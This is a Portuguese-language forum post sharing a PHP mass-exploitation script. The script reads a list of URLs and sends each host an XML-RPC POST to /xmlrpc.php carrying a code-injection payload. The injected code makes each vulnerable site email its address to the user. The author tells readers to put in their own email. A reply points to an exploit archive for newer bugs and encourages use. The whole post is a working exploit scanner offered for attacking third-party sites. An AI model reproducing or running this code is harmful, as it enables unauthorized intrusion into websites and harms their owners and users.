<?php
</span><span class="syntaxcomment">//by branco - Ictu Oculi
</span><span class="syntaxdefault">$handle </span><span class="syntaxkeyword">= </span><span class="syntaxdefault">fopen</span><span class="syntaxkeyword">(</span><span class="syntaxstring">'maquinas.txt'</span><span class="syntaxkeyword">,</span><span class="syntaxstring">'r'</span><span class="syntaxkeyword">);
</span><span class="syntaxdefault">$buffer </span><span class="syntaxkeyword">=&</span><span class="syntaxdefault">nbsp</span><span class="syntaxkeyword">; </span><span class="syntaxdefault">fread</span><span class="syntaxkeyword">(</span><span class="syntaxdefault">$handle</span><span class="syntaxkeyword">, </span><span class="syntaxdefault">8192</span><span class="syntaxkeyword">);
</span><span class="syntaxdefault">fclose</span><span class="syntaxkeyword">(</span><span class="syntaxdefault">$handle</span><span class="syntaxkeyword">);
</span><span class="syntaxdefault">preg_match_all</span><span class="syntaxkeyword">(</span><span class="syntaxstring">'/http:\/\/[^">) ]*/'</span><span class="syntaxkeyword">,</span><span class="syntaxdefault">$buffer</span><span class="syntaxkeyword">,</span><span class="syntaxdefault">$matches</span><span class="syntaxkeyword">);
</span><span class="syntaxdefault">print_r</span><span class="syntaxkeyword">(</span><span class="syntaxdefault">$matches</span><span class="syntaxkeyword">);
</span><span class="syntaxdefault">$matches2 </span><span class="syntaxkeyword">= array();
</span><span class="syntaxdefault">$vuls </span><span class="syntaxkeyword">= array();
foreach(</span><span class="syntaxdefault">$matches</span><span class="syntaxkeyword">[</span><span class="syntaxdefault">0</span><span class="syntaxkeyword">] as </span><span class="syntaxdefault">$key </span><span class="syntaxkeyword">=> </span><span class="syntaxdefault">$value</span><span class="syntaxkeyword">) {
&</span><span class="syntaxdefault">nbsp</span><span class="syntaxkeyword">; &</span><span class="syntaxdefault">nbsp</span><span class="syntaxkeyword">; </span><span class="syntaxdefault">preg_match</span><span class="syntaxkeyword">(</span><span class="syntaxstring">'/http:\/\/[^\/]*/'</span><span class="syntaxkeyword">,</span><span class="syntaxdefault">$value</span><span class="syntaxkeyword">,</span><span class="syntaxdefault">$first_step</span><span class="syntaxkeyword">); </span><span class="syntaxcomment"># get content in http://..../
</span><span class="syntaxkeyword">&</span><span class="syntaxdefault">nbsp</span><span class="syntaxkeyword">; &</span><span class="syntaxdefault">nbsp</span><span class="syntaxkeyword">; </span><span class="syntaxdefault">$second_step </span><span class="syntaxkeyword">= </span><span class="syntaxdefault">preg_split</span><span class="syntaxkeyword">(</span><span class="syntaxstring">'/http:\/\/[^\/]*/'</span><span class="syntaxkeyword">,</span><span class="syntaxdefault">$value</span><span class="syntaxkeyword">); </span><span class="syntaxcomment"># get /.../..../..., the rest of url
</span><span class="syntaxkeyword">&</span><span class="syntaxdefault">nbsp</span><span class="syntaxkeyword">; &</span><span class="syntaxdefault">nbsp</span><span class="syntaxkeyword">; </span><span class="syntaxdefault">$site </span><span class="syntaxkeyword">= </span><span class="syntaxdefault">str_replace</span><span class="syntaxkeyword">(</span><span class="syntaxstring">'http://'</span><span class="syntaxkeyword">,</span><span class="syntaxstring">''</span><span class="syntaxkeyword">,</span><span class="syntaxdefault">$first_step</span><span class="syntaxkeyword">[</span><span class="syntaxdefault">0</span><span class="syntaxkeyword">]);
&</span><span class="syntaxdefault">nbsp</span><span class="syntaxkeyword">; &</span><span class="syntaxdefault">nbsp</span><span class="syntaxkeyword">; </span><span class="syntaxdefault">$url </span><span class="syntaxkeyword">= </span><span class="syntaxdefault">$second_step</span><span class="syntaxkeyword">[</span><span class="syntaxdefault">1</span><span class="syntaxkeyword">];
&</span><span class="syntaxdefault">nbsp</span><span class="syntaxkeyword">; &</span><span class="syntaxdefault">nbsp</span><span class="syntaxkeyword">; </span><span class="syntaxdefault">$port </span><span class="syntaxkeyword">= </span><span class="syntaxdefault">80</span><span class="syntaxkeyword">;
&</span><span class="syntaxdefault">nbsp</span><span class="syntaxkeyword">; &</span><span class="syntaxdefault">nbsp</span><span class="syntaxkeyword">; </span><span class="syntaxdefault">$exploit</span><span class="syntaxkeyword">&</span><span class="syntaxdefault">nbsp</span><span class="syntaxkeyword">; = </span><span class="syntaxstring">"<?xml version=\"1.0\"?><methodCall>";
$exploit .= "<methodName>test.method</methodName>";
$exploit .= "<params><param><value><name>',''));";
$headersMail = 'From: webmaster@example.com';
$exploit .= "mail('seu@hotmail.com','$site$url','vul','$headersMail');exit;/*</name></value></param></params></methodCall>";
$header = "POST /xmlrpc.php HTTP/1.1 \r\n";
$header .= "Host: $site \r\n";
$header .= "Content-Type: text/xml \r\n";
$header .= "Connection: close \r\n";
$header .= "Content-length: " . strlen($exploit) . "\r\n\r\n";
$header .= $exploit;
$sk = socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
if(is_resource($sk) == false) {
continue 1;
}
$conn = @socket_connect($sk, $site, $port);
if($conn == false) {
continue 1;
}
socket_write($sk,$header,strlen($header));
socket_close($sk);
}
?>
Reparem que devem modificar "seu@hotmail.com" e o nome do arquivo no fopen.
Os sites que estiverem vulneráveis serão enviados para seu e-mail.
Não reparem se tiver algo sem nexo por aí, faz um tempim que codei.
Até
Num é meio velho esse bug pra se fazer scanner, não?
Mas se liga... Tem muito bug novo mais poderoso...
http://www.milw0rm.com/remote.php (http://www.milw0rm.com/remote.php)
Escolhe alguma coisa e vai fundo....
Mas aee.. Parabéns pelo seu code